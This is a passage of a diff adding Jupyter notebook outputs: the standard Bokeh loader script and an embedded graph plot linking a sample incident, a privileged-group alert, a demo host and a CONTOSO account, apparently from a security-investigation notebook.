output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1003\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1003\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"a0064421-a413-4691-a24c-d9983ce2390b\" data-root-id=\"1004\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"4add1874-9b92-430d-8e0a-e28abcba60ea\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"1015\"}],\"center\":[{\"id\":\"1018\"},{\"id\":\"1022\"},{\"id\":\"1054\"},{\"id\":\"1055\"},{\"id\":\"1056\"},{\"id\":\"1057\"}],\"height\":800,\"left\":[{\"id\":\"1019\"}],\"renderers\":[{\"id\":\"1039\"}],\"title\":{\"id\":\"1005\"},\"toolbar\":{\"id\":\"1030\"},\"width\":800,\"x_range\":{\"id\":\"1007\"},\"x_scale\":{\"id\":\"1011\"},\"y_range\":{\"id\":\"1009\"},\"y_scale\":{\"id\":\"1013\"}},\"id\":\"1004\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"1067\",\"type\":\"NodesOnly\"},{\"attributes\":{\"data_source\":{\"id\":\"1041\"},\"glyph\":{\"id\":\"1049\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"1043\"}},\"id\":\"1042\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"1049\",\"type\":\"Circle\"},{\"attributes\":{\"data_source\":{\"id\":\"1045\"},\"glyph\":{\"id\":\"1044\"},\"hover_glyph\":null,\"muted_glyph\":null,\"view\":{\"id\":\"1047\"}},\"id\":\"1046\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"SaveTool\"},{\"attributes\":{},\"id\":\"1028\",\"type\":\"HelpTool\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"1009\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1073\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"data\":{\"end\":[\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"demo\",\"CONTOSO\\\\auser\"],\"start\":[\"Incident: Sample Incident\",\"Incident: Sample Incident\",\"Incident: Sample Incident\"]},\"selected\":{\"id\":\"1078\"},\"selection_policy\":{\"id\":\"1079\"}},\"id\":\"1045\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1059\",\"type\":\"AllLabels\"},{\"attributes\":{\"source\":{\"id\":\"1045\"}},\"id\":\"1047\",\"type\":\"CDSView\"},{\"attributes\":{\"data\":{\"color\":[\"red\",\"orange\",\"green\",\"green\"],\"description\":[\"2021-09-22T15:09:09.2786667Z - Sample Incident - 123\",\"User Added to Priviledged Group in CONTOSO Domain - ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5']\",\"demo.demo.contoso.com (OSFamily.Windows)\",null],\"end_time\":[\"2021-09-22T14:39:24.04Z\",null,null,null],\"entitytype\":[\"incident\",\"alert\",\"host\",\"account\"],\"index\":[\"Incident: Sample Incident\",\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"demo\",\"CONTOSO\\\\auser\"],\"name\":[\"Sample Incident\",\"User Added to Priviledged Group in CONTOSO Domain\",\"demo\",\"CONTOSO\\\\auser\"],\"node_color\":[\"red\",\"orange\",\"green\",\"green\"],\"node_type\":[\"incident\",\"alert\",\"entity\",\"entity\"],\"source\":[null,\"{ 'AdditionalData': { 'ID': '8b7d06d8-dbae-4b23-87ed-1a27b75437d5',\\n                      'Name': 'User Added to Priviledged Group in CONTOSO Domain'},\\n  'DisplayName': 'User Added to Priviledged Group in CONTOSO Domain',\\n  'SystemAlertIds': ['8b7d06d8-dbae-4b23-87ed-1a27b75437d5'],\\n  'Type': 'alerts',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'DnsDomain': 'demo.contoso.com',\\n  'HostName': 'demo',\\n  'IsDomainJoined': False,\\n  'NetBiosName': 'demo',\\n  'OSFamily': <OSFamily.Windows: 1>,\\n  'Type': 'host',\\n  'edges': set()}\",\"{ 'AdditionalData': {},\\n  'DisplayName': 'CONTOSO\\\\\\\\auser',\\n  'IsDomainJoined': False,\\n  'Type': 'account',\\n  'edges': set()}\"],\"start_time\":[\"2021-09-22T14:39:24.04Z\",null,null,null],\"time_generated\":[\"2021-09-22T15:09:09.2786667Z\",null,null,null]},\"selected\":{\"id\":\"1076\"},\"selection_policy\":{\"id\":\"1077\"}},\"id\":\"1041\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"1023\",\"type\":\"PanTool\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"1007\",\"type\":\"Range1d\"},{\"attributes\":{\"source\":{\"id\":\"1041\"}},\"id\":\"1043\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1016\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1079\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1060\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"text\":\"Alert Entity graph\"},\"id\":\"1005\",\"type\":\"Title\"},{\"attributes\":{\"text\":\"CONTOSO\\\\auser\",\"text_font_size\":\"10pt\",\"x\":1.8039621580030154,\"x_offset\":5,\"y\":0.8735754537559727,\"y_offset\":5},\"id\":\"1057\",\"type\":\"Label\"},{\"attributes\":{\"formatter\":{\"id\":\"1073\"},\"major_label_policy\":{\"id\":\"1072\"},\"ticker\":{\"id\":\"1016\"}},\"id\":\"1015\",\"type\":\"LinearAxis\"},{\"attributes\":{\"formatter\":{\"id\":\"1060\"},\"major_label_policy\":{\"id\":\"1059\"},\"ticker\":{\"id\":\"1020\"}},\"id\":\"1019\",\"type\":\"LinearAxis\"},{\"attributes\":{\"edge_renderer\":{\"id\":\"1046\"},\"inspection_policy\":{\"id\":\"1066\"},\"layout_provider\":{\"id\":\"1048\"},\"node_renderer\":{\"id\":\"1042\"},\"selection_policy\":{\"id\":\"1067\"}},\"id\":\"1039\",\"type\":\"GraphRenderer\"},{\"attributes\":{\"text\":\"Alert: User Added to Priviledged Group in CONTOSO Domain\",\"text_font_size\":\"10pt\",\"x\":-0.14342629555689357,\"x_offset\":5,\"y\":-1.9999999999999998,\"y_offset\":5},\"id\":\"1055\",\"type\":\"Label\"},{\"attributes\":{\"text\":\"demo\",\"text_font_size\":\"10pt\",\"x\":-1.6577200485398014,\"x_offset\":5,\"y\":1.1278410476526268,\"y_offset\":5},\"id\":\"1056\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"1076\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1027\",\"type\":\"ResetTool\"},{\"attributes\":{\"axis\":{\"id\":\"1015\"},\"ticker\":null},\"id\":\"1018\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1078\",\"type\":\"Selection\"},{\"attributes\":{\"callback\":null,\"tooltips\":[[\"node_type\",\"@node_type\"],[\"name\",\"@name\"],[\"description\",\"@description\"],[\"entitytype\",\"@entitytype\"]]},\"id\":\"1037\",\"type\":\"HoverTool\"},{\"attributes\":{\"text\":\"Incident: Sample Incident\",\"text_font_size\":\"10pt\",\"x\":-0.0028158139063199873,\"x_offset\":5,\"y\":-0.0014165014085999257,\"y_offset\":5},\"id\":\"1054\",\"type\":\"Label\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1023\"},{\"id\":\"1024\"},{\"id\":\"1025\"},{\"id\":\"1026\"},{\"id\":\"1027\"},{\"id\":\"1028\"},{\"id\":\"1037\"}]},\"id\":\"1030\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1020\",\"type\":\"BasicTicker\"},{\"attributes\":{},\"id\":\"1072\",\"type\":\"AllLabels\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1029\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"axis\":{\"id\":\"1019\"},\"dimension\":1,\"ticker\":null},\"id\":\"1022\",\"type\":\"Grid\"},{\"attributes\":{},\"id\":\"1077\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1044\",\"type\":\"MultiLine\"},{\"attributes\":{},\"id\":\"1066\",\"type\":\"NodesOnly\"},{\"attributes\":{},\"id\":\"1011\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1013\",\"type\":\"LinearScale\"},{\"attributes\":{\"overlay\":{\"id\":\"1029\"}},\"id\":\"1025\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1024\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"graph_layout\":{\"Alert: User Added to Priviledged Group in CONTOSO Domain\":[-0.14342629555689357,-1.9999999999999998],\"CONTOSO\\\\auser\":[1.8039621580030154,0.8735754537559727],\"Incident: Sample Incident\":[-0.0028158139063199873,-0.0014165014085999257],\"demo\":[-1.6577200485398014,1.1278410476526268]}},\"id\":\"1048\",\"type\":\"StaticLayoutProvider\"}],\"root_ids\":[\"1004\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.3\"}};\n  var render_items = [{\"docid\":\"4add1874-9b92-430d-8e0a-e28abcba60ea\",\"root_ids\":[\"1004\"],\"roots\":{\"1004\":\"a0064421-a413-4691-a24c-d9983ce2390b\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1004"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.plotting.figure.Figure\">Figure</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1004', <span id=\"1203\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">above&nbsp;=&nbsp;[],</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_scale&nbsp;=&nbsp;1,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">below&nbsp;=&nbsp;[LinearAxis(id='1015', ...)],</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">border_fill_color&nbsp;=&nbsp;'#ffffff',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">center&nbsp;=&nbsp;[Grid(id='1018', ...), Grid(id='1022', ...), Label(id='1054', ...), Label(id='1055', ...), Label(id='1056', ...), Label(id='1057', ...)],</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_x_ranges&nbsp;=&nbsp;{},</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">extra_y_ranges&nbsp;=&nbsp;{},</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_height&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">frame_width&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;800,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">hidpi&nbsp;=&nbsp;True,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_height&nbsp;=&nbsp;0,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">inner_width&nbsp;=&nbsp;0,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">left&nbsp;=&nbsp;[LinearAxis(id='1019', ...)],</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_factor&nbsp;=&nbsp;10,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_interval&nbsp;=&nbsp;300,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_threshold&nbsp;=&nbsp;2000,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">lod_timeout&nbsp;=&nbsp;500,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">match_aspect&nbsp;=&nbsp;False,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border&nbsp;=&nbsp;5,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_bottom&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_left&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_right&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_border_top&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_height&nbsp;=&nbsp;0,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outer_width&nbsp;=&nbsp;0,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_alpha&nbsp;=&nbsp;1.0,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_cap&nbsp;=&nbsp;'butt',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_color&nbsp;=&nbsp;'#e5e5e5',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash&nbsp;=&nbsp;[],</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_dash_offset&nbsp;=&nbsp;0,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_join&nbsp;=&nbsp;'bevel',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">outline_line_width&nbsp;=&nbsp;1,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">output_backend&nbsp;=&nbsp;'canvas',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">renderers&nbsp;=&nbsp;[GraphRenderer(id='1039', ...)],</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='1005', ...),</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='1030', ...),</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'right',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;800,</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;Range1d(id='1007', ...),</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;LinearScale(id='1011', ...),</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;Range1d(id='1009', ...),</div></div><div class=\"1202\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;LinearScale(id='1013', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"1203\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"1202\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Figure(id='1004', ...)"
+      ]
+     },
+     "execution_count": 3,
